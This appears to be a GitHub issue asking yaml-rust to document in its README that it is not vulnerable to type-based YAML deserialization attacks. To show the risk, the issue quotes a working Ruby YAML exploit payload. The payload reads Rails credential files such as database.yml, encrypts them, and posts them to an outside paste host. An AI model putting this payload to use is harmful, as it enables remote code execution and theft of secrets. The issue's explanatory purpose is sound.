Open
Description
Let's document in the README that yaml-rust does not attempt to instantiate arbitrary Rust types and is not vulnerable to the sort of type-based remote code execution that affects some Ruby and Java yaml libraries.
https://community.embarcadero.com/blogs/entry/yaml-and-remote-code-execution-38738
exploit: !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection
? ! "foo\n(require 'net/http'\nrequire 'digest'\nrequire 'openssl'\nrequire 'base64'\n\naes
= proc { |text|\n # sourzed from MetaSploit, best pwning t00l ev4r!\n aes_256
= OpenSSL::Cipher.new('aes-256-cbc')\n aes_256.encrypt\n aes_256.key = Digest::MD5.hexdigest(`uname
-r`)\n\n crypted = aes_256.update(text)\n crypted << aes_256.final\n\n Base64.encode64(crypted)\n}\n\nexfil
= proc { |path|\n if File.file?(path) == true\n \"::: #{path} :::\\n\\n#{File.read(path)}\"\n
\ end\n}\n\nloot = [\"config/database.yml\", \"config/librato.yml\", \"config/newrelic.yml\",
\"config/rubygems.yml\"].map { |path| exfil.call(path) }.join\n\nif !(loot.empty?)\nNet::HTTP.post_form(URI('http://pastie.org/pastes'),
{\n 'paste[authorization]' => 'burger',\n 'paste[access_key]' => '',\n 'paste[parse_id]'
\ => '6',\n 'paste[body]' => \"e193256c9337b50b197f040e762dafcc745a66297c9db47ac30395d8022f94a8\\n\\n#{aes.call(loot)}\",\n
\ 'paste[restricted]' => '0',\n 'commit' => 'Create Paste'\n})\nend;
@executed = true) unless @executed\n__END__\n"
: !ruby/object:OpenStructMetadata
Metadata
Assignees
Labels
No labels